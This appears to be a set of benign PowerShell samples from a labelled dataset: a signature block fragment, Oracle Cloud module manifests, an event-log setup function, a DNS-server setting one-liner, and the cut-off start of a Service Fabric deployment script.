# TiH87/S+ZsXcExH7jmsBkwARMmxEM/EckKj/lcaFZ2D8ugnldYGs4Mvjhg2s3sVG
# ccQACvTqx+Wpnx55XcW4Mp0/mHX1ZScZbA7Uf9mNTM6hUaJXeDCCB3EwggVZoAMC
# AQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNV
# BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w
# HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29m
# dCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIy
# NVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9
# DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2
# Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N
# 7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXc
# ag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJ
# j361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjk
# lqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37Zy
# L9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M
# 269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLX
# pyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU
# HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode
# 2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEA
# ATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYE
# FJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEB
# MEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# RG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEE
# AYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB
# /zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEug
# SaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9N
# aWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsG
# AQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv
# b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt
# 4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsP
# MeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++
# Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9
# QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2
# wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aR
# AfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5z
# bcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nx
# t67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3
# Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+AN
# uOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z
# cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNZMIICQQIBATCCAQGhgdmkgdYw
# gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT
# JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe
# blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCEY0cP9rtDRtAt
# ZUb0m4bGAtFex6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MA0GCSqGSIb3DQEBCwUAAgUA6snSCDAiGA8yMDI0MTAyODA5MDQwOFoYDzIwMjQx
# MDI5MDkwNDA4WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqydIIAgEAMAoCAQAC
# AgiwAgH/MAcCAQACAhLGMAoCBQDqyyOIAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG
# CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL
# BQADggEBADNJzLXAFulwDG4ktiexNvYLVH/Vlc9FOtX7vDiLPH6hc4cBS71ocYbS
# pI4GOTtWDIK+MUyKtPXUcgsEFMdOIlwDXPlvk4h3KzRFZZycsJAZIoi2bwo02l4T
# 6gT2+JBEcwuxT/dvyG7NYQdMN447JzzA1UgkJw9cMZCDjZh/Woyqg+mrIKYxNKOf
# ddDSeWWY14YJ5SR0iw1OnAPiZttVc9Wr4ptW3+Nq0lnDditOePODWPkB2uiUD9o3
# cKMzSB/blfAMRNqfPsotseR/PmDEA3yolNhtI6jIZNivxyXlGquun7SPCmUr5L0V
# VSnBk20pTBhI2I5KwD1Llt8OY6Bx3yQxggQNMIIECQIBATCBkzB8MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg
# VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAf7QqMJ7NCELAQABAAAB/jANBglghkgB
# ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3
# DQEJBDEiBCA5xPnWlI6IaamgbeaW+5Vj9t3rasqWbBVb0F1slL8acjCB+gYLKoZI
# hvcNAQkQAi8xgeowgecwgeQwgb0EIBGFzN38U8ifGNH3abaE9apz68Y4bX78jRa2
# QKy3KHR5MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
# b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh
# dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA
# AAH+0KjCezQhCwEAAQAAAf4wIgQgEdpvkq3zQZh4gWo+N1cBUbQciDORDclLAfrk
# pRpKe+gwDQYJKoZIhvcNAQELBQAEggIAKtn9lZw+eeC5G+haSNMFpXyTY8uBGrWe
# J+B15ep2JzrIQi2gHErsiGRB+KiVC76ki0u12ugvEqe2qlNcJOVs3X96Xxp6H7BL
# kDLQfbBZIYvqoTfMwIcNrR8BKOUg5fmTpkJG2dnnSRMU5OmecoRmrx1dW1tu6VpO
# GarS6se2CSlYGzBQT+DUrAkfMW72BbUs+jF1xoPolJ7+8ppYUHJX9z3YZ2662Rrj
# JtfJfReR7WrzqiD6fF/JCBRqqyk5EPots5q6NIVVBeH2d1w5Fl6DtQRkEmsdffu+
# hmZWqyUvgFH7jWbWxT/g18GY/Caa+tvtKhf0+kW/51EcCN9v2c0dreGl4PXqUykM
# m0lFW1moiiViF8cn19S1mbh4n8FNgPWmQ5TpeAfUwmDyAmJMHduFQn59pdcRh+hE
# raIhltJRnTu39wuYq8qQCc0gfr5qqbi0oLPnPyao1nCIURNDuLzZ+RrTAOGxMuSK
# /qRun/OmeWPlIYn5j3+DQ88bdHjRVZHHCwFwSNIqcqU87558O6Gaa0JpXnBjabVu
# 4TVA77df7pgCE7pYFDL8/HSnd4NTXUS4M1DPBwdsjxzePqPBh4gGjReLsQDgbWAd
# M8sW7PrFm6Q7+q1rsBV5BkxmRjsjK9tI/yxP5Bg5oonBaTDx6qme0vGpYxTjYGVb
# FHccMZBPHmE=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_31_62.ps1
|
sample_31_62.ps1
|
#
# Module manifest for module 'OCI.PSModules.Dns'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Dns.dll'
# Version number of this module.
ModuleVersion = '77.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'd69f0172-1c3b-4e1b-97f5-d455d0244e12'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Dns Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dns.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIDnsDomainRecords', 'Get-OCIDnsResolver',
'Get-OCIDnsResolverEndpoint', 'Get-OCIDnsResolverEndpointsList',
'Get-OCIDnsResolversList', 'Get-OCIDnsRRSet',
'Get-OCIDnsSteeringPoliciesList', 'Get-OCIDnsSteeringPolicy',
'Get-OCIDnsSteeringPolicyAttachment',
'Get-OCIDnsSteeringPolicyAttachmentsList', 'Get-OCIDnsTsigKey',
'Get-OCIDnsTsigKeysList', 'Get-OCIDnsView', 'Get-OCIDnsViewsList',
'Get-OCIDnsZone', 'Get-OCIDnsZoneContent', 'Get-OCIDnsZoneRecords',
'Get-OCIDnsZonesList', 'Get-OCIDnsZoneTransferServersList',
'Invoke-OCIDnsPatchDomainRecords', 'Invoke-OCIDnsPatchRRSet',
'Invoke-OCIDnsPatchZoneRecords', 'Move-OCIDnsResolverCompartment',
'Move-OCIDnsSteeringPolicyCompartment',
'Move-OCIDnsTsigKeyCompartment', 'Move-OCIDnsViewCompartment',
'Move-OCIDnsZoneCompartment', 'New-OCIDnsResolverEndpoint',
'New-OCIDnsSteeringPolicy', 'New-OCIDnsSteeringPolicyAttachment',
'New-OCIDnsTsigKey', 'New-OCIDnsView', 'New-OCIDnsZone',
'New-OCIDnsZoneFromZoneFile', 'Remove-OCIDnsDomainRecords',
'Remove-OCIDnsResolverEndpoint', 'Remove-OCIDnsRRSet',
'Remove-OCIDnsSteeringPolicy',
'Remove-OCIDnsSteeringPolicyAttachment', 'Remove-OCIDnsTsigKey',
'Remove-OCIDnsView', 'Remove-OCIDnsZone',
'Update-OCIDnsDomainRecords', 'Update-OCIDnsResolver',
'Update-OCIDnsResolverEndpoint', 'Update-OCIDnsRRSet',
'Update-OCIDnsSteeringPolicy',
'Update-OCIDnsSteeringPolicyAttachment', 'Update-OCIDnsTsigKey',
'Update-OCIDnsView', 'Update-OCIDnsZone', 'Update-OCIDnsZoneRecords'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dns'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_40_30.ps1
|
sample_40_30.ps1
|
#
# Module manifest for module 'OCI.PSModules.Resourcemanager'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Resourcemanager.dll'
# Version number of this module.
ModuleVersion = '83.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '73e0f641-602c-4457-9e79-f05b84ced282'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Resourcemanager Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Resourcemanager.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIResourcemanagerConfigurationSourceProvider',
'Get-OCIResourcemanagerConfigurationSourceProvidersList',
'Get-OCIResourcemanagerJob',
'Get-OCIResourcemanagerJobAssociatedResourcesList',
'Get-OCIResourcemanagerJobDetailedLogContent',
'Get-OCIResourcemanagerJobLogs',
'Get-OCIResourcemanagerJobLogsContent',
'Get-OCIResourcemanagerJobOutputsList',
'Get-OCIResourcemanagerJobsList',
'Get-OCIResourcemanagerJobTfConfig',
'Get-OCIResourcemanagerJobTfPlan',
'Get-OCIResourcemanagerJobTfState',
'Get-OCIResourcemanagerPrivateEndpoint',
'Get-OCIResourcemanagerPrivateEndpointsList',
'Get-OCIResourcemanagerReachableIp',
'Get-OCIResourcemanagerResourceDiscoveryServicesList',
'Get-OCIResourcemanagerStack',
'Get-OCIResourcemanagerStackAssociatedResourcesList',
'Get-OCIResourcemanagerStackResourceDriftDetailsList',
'Get-OCIResourcemanagerStacksList',
'Get-OCIResourcemanagerStackTfConfig',
'Get-OCIResourcemanagerStackTfState',
'Get-OCIResourcemanagerTemplate',
'Get-OCIResourcemanagerTemplateCategoriesList',
'Get-OCIResourcemanagerTemplateLogo',
'Get-OCIResourcemanagerTemplatesList',
'Get-OCIResourcemanagerTemplateTfConfig',
'Get-OCIResourcemanagerTerraformVersionsList',
'Get-OCIResourcemanagerWorkRequest',
'Get-OCIResourcemanagerWorkRequestErrorsList',
'Get-OCIResourcemanagerWorkRequestLogsList',
'Get-OCIResourcemanagerWorkRequestsList',
'Invoke-OCIResourcemanagerDetectStackDrift',
'Move-OCIResourcemanagerConfigurationSourceProviderCompartment',
'Move-OCIResourcemanagerPrivateEndpointCompartment',
'Move-OCIResourcemanagerStackCompartment',
'Move-OCIResourcemanagerTemplateCompartment',
'New-OCIResourcemanagerConfigurationSourceProvider',
'New-OCIResourcemanagerJob',
'New-OCIResourcemanagerPrivateEndpoint',
'New-OCIResourcemanagerStack', 'New-OCIResourcemanagerTemplate',
'Remove-OCIResourcemanagerConfigurationSourceProvider',
'Remove-OCIResourcemanagerPrivateEndpoint',
'Remove-OCIResourcemanagerStack',
'Remove-OCIResourcemanagerTemplate', 'Stop-OCIResourcemanagerJob',
'Update-OCIResourcemanagerConfigurationSourceProvider',
'Update-OCIResourcemanagerJob',
'Update-OCIResourcemanagerPrivateEndpoint',
'Update-OCIResourcemanagerStack',
'Update-OCIResourcemanagerTemplate'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Resourcemanager'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/506.ps1
|
506.ps1
|
function Update-PPEventLog{
param(
)
Get-PPConfiguration $PSconfigs.EventLog.Filter | %{$_.Content.EventLog} | %{
$EventLog = Get-WmiObject win32_nteventlogfile -filter "filename='$($_.Name)'"
if(-not ($EventLog)){
Write-Host "Create event log: $($_.Name)"
New-EventLog -LogName $_.Name -Source $_.Source -ErrorAction SilentlyContinue
$EventLog = Get-WmiObject win32_nteventlogfile -filter "filename='$($_.Name)'"
}
$SourcesTO = ($_.Source | %{"$($_.Name)"}) + ($_.Source | where{$_.Expression} | %{$_.Expression | iex})
$SourcesIS = $EventLog.Sources
Compare-Object $SourcesTO $SourcesIS -passThru | Where-Object{ $_.SideIndicator -eq '<=' } | %{
Write-Host "Add source: $_ to event log: $($EventLog.LogfileName)"
New-EventLog -Source $_ -LogName $EventLog.LogfileName
}
Compare-Object $SourcesTO $SourcesIS -passThru | Where-Object{ $_.SideIndicator -eq '=>' } | %{
Write-Host "Remove source: $_ from event log: $($EventLog.LogfileName)"
Remove-EventLog -Source $_
}
}
}
|
combined_dataset/train/non-malicious/Set-DNSServersToOpenDNS.ps1
|
Set-DNSServersToOpenDNS.ps1
|
Get-WmiObject win32_networkadapterconfiguration -filter "ipenabled = 'true'" | ForEach-Object {
$_.SetDNSServerSearchOrder(@("208.67.222.222","208.67.220.220"));
}
|
combined_dataset/train/non-malicious/sample_47_60.ps1
|
sample_47_60.ps1
|
<#
.SYNOPSIS
Deploys a Service Fabric application type to a cluster.
.DESCRIPTION
This script deploys a Service Fabric application type to a cluster. It is invoked by Visual Studio when deploying a Service Fabric Application project.
.NOTES
WARNING: This script file is invoked by Visual Studio. Its parameters must not be altered but its logic can be customized as necessary.
.PARAMETER PublishProfileFile
Path to the file containing the publish profile.
.PARAMETER StartupServicesFile
Path to the file containing the startup services for debugging.
.PARAMETER ApplicationPackagePath
Path to the folder of the packaged Service Fabric application.
.PARAMETER DeployOnly
Indicates that the Service Fabric application should not be created or upgraded after registering the application type.
.PARAMETER ApplicationParameter
Hashtable of the Service Fabric application parameters to be used for the application.
.PARAMETER UnregisterUnusedApplicationVersionsAfterUpgrade
Indicates whether to unregister any unused application versions that exist after an upgrade is finished.
.PARAMETER OverrideUpgradeBehavior
Indicates the behavior used to override the upgrade settings specified by the publish profile.
'None' indicates that the upgrade settings will not be overridden.
'ForceUpgrade' indicates that an upgrade will occur with default settings, regardless of what is specified in the publish profile.
'VetoUpgrade' indicates that an upgrade will not occur, regardless of what is specified in the publish profile.
.PARAMETER UseExistingClusterConnection
Indicates that the script should make use of an existing cluster connection that has already been established in the PowerShell session. The cluster connection parameters configured in the publish profile are ignored.
.PARAMETER OverwriteBehavior
Overwrite Behavior if an application exists in the cluster with the same name. Available Options are Never, Always, SameAppTypeAndVersion. This setting is not applicable when upgrading an application.
'Never' will not remove the existing application. This is the default behavior.
'Always' will remove the existing application even if its Application type and Version is different from the application being created.
'SameAppTypeAndVersion' will remove the existing application only if its Application type and Version is same as the application being created.
.PARAMETER SkipPackageValidation
Switch signaling whether the package should be validated or not before deployment.
.PARAMETER SecurityToken
A security token for authentication to cluster management endpoints. Used for silent authentication to clusters that are protected by Microsoft Entra ID (formerly known as Azure Active Directory).
.PARAMETER CopyPackageTimeoutSec
Timeout in seconds for copying application package to image store.
.EXAMPLE
. Scripts\Deploy-FabricApplication.ps1 -ApplicationPackagePath 'pkg\Debug'
Deploy the application using the default package location for a Debug build.
.EXAMPLE
. Scripts\Deploy-FabricApplication.ps1 -ApplicationPackagePath 'pkg\Debug' -DoNotCreateApplication
Deploy the application but do not create the application instance.
.EXAMPLE
. Scripts\Deploy-FabricApplication.ps1 -ApplicationPackagePath 'pkg\Debug' -ApplicationParameter @{CustomParameter1='MyValue'; CustomParameter2='MyValue'}
Deploy the application by providing values for parameters that are defined in the application manifest.
#>
Param
(
[String]
$PublishProfileFile,
[String]
$StartupServicesFile,
[String]
$ApplicationPackagePath,
[Switch]
$DeployOnly,
[Hashtable]
$ApplicationParameter,
[Boolean]
$UnregisterUnusedApplicationVersionsAfterUpgrade,
[String]
[ValidateSet('None', 'ForceUpgrade', 'VetoUpgrade')]
$OverrideUpgradeBehavior = 'None',
[Switch]
$UseExistingClusterConnection,
[String]
[ValidateSet('Never', 'Always', 'SameAppTypeAndVersion')]
$OverwriteBehavior = 'Never',
[Switch]
$SkipPackageValidation,
[String]
$SecurityToken,
[int]
$CopyPackageTimeoutSec,
[int]
$RegisterApplicationTypeTimeoutSec
)
function Read-XmlElementAsHashtable
{
Param (
[System.Xml.XmlElement]
$Element
)
$hashtable = @{}
if ($Element.Attributes)
{
$Element.Attributes |
ForEach-Object {
$boolVal = $null
if ([bool]::TryParse($_.Value, [ref]$boolVal)) {
$hashtable[$_.Name] = $boolVal
}
else {
$hashtable[$_.Name] = $_.Value
}
}
}
return $hashtable
}
function Read-PublishProfile
{
Param (
[ValidateScript({Test-Path $_ -PathType Leaf})]
[String]
$PublishProfileFile
)
$publishProfileXml = [Xml] (Get-Content $PublishProfileFile -Encoding UTF8)
$publishProfile = @{}
$publishProfile.ClusterConnectionParameters = Read-XmlElementAsHashtable $publishProfileXml.PublishProfile.Item("ClusterConnectionParameters")
$publishProfile.UpgradeDeployment = Read-XmlElementAsHashtable $publishProfileXml.PublishProfile.Item("UpgradeDeployment")
$publishProfile.CopyPackageParameters = Read-XmlElementAsHashtable $publishProfileXml.PublishProfile.Item("CopyPackageParameters")
$publishProfile.RegisterApplicationParameters = Read-XmlElementAsHashtable $publishProfileXml.PublishProfile.Item("RegisterApplicationParameters")
if ($publishProfileXml.PublishProfile.Item("UpgradeDeployment"))
{
$publishProfile.UpgradeDeployment.Parameters = Read-XmlElementAsHashtable $publishProfileXml.PublishProfile.Item("UpgradeDeployment").Item("Parameters")
if ($publishProfile.UpgradeDeployment["Mode"])
{
$publishProfile.UpgradeDeployment.Parameters[$publishProfile.UpgradeDeployment["Mode"]] = $true
}
}
$publishProfileFolder = (Split-Path $PublishProfileFile)
$publishProfile.ApplicationParameterFile = [System.IO.Path]::Combine($PublishProfileFolder, $publishProfileXml.PublishProfile.ApplicationParameterFile.Path)
$publishProfile.StartupServiceParameterFile = [System.IO.Path]::Combine($PublishProfileFolder, $publishProfileXml.PublishProfile.StartupServiceParameterFile.Path)
return $publishProfile
}
$LocalFolder = (Split-Path $MyInvocation.MyCommand.Path)
if (!$PublishProfileFile)
{
$PublishProfileFile = "$LocalFolder\..\PublishProfiles\Local.xml"
}
if (!$ApplicationPackagePath)
{
$ApplicationPackagePath = "$LocalFolder\..\pkg\Release"
}
$ApplicationPackagePath = Resolve-Path $ApplicationPackagePath
$publishProfile = Read-PublishProfile $PublishProfileFile
if (-not $UseExistingClusterConnection)
{
$ClusterConnectionParameters = $publishProfile.ClusterConnectionParameters
if ($SecurityToken)
{
$ClusterConnectionParameters["SecurityToken"] = $SecurityToken
}
try
{
[void](Connect-ServiceFabricCluster @ClusterConnectionParameters)
}
catch [System.Fabric.FabricObjectClosedException]
{
Write-Warning "Service Fabric cluster may not be connected."
throw
}
}
$RegKey = "HKLM:\SOFTWARE\Microsoft\Service Fabric SDK"
$ModuleFolderPath = (Get-ItemProperty -Path $RegKey -Name FabricSDKPSModulePath).FabricSDKPSModulePath
Import-Module "$ModuleFolderPath\ServiceFabricSDK.psm1"
$IsUpgrade = ($publishProfile.UpgradeDeployment -and $publishProfile.UpgradeDeployment.Enabled -and $OverrideUpgradeBehavior -ne 'VetoUpgrade') -or $OverrideUpgradeBehavior -eq 'ForceUpgrade'
$PublishParameters = @{
'ApplicationPackagePath' = $ApplicationPackagePath
'ApplicationParameterFilePath' = $publishProfile.ApplicationParameterFile
'ApplicationParameter' = $ApplicationParameter
'ErrorAction' = 'Stop'
}
if ($publishProfile.CopyPackageParameters.CopyPackageTimeoutSec)
{
$PublishParameters['CopyPackageTimeoutSec'] = $publishProfile.CopyPackageParameters.CopyPackageTimeoutSec
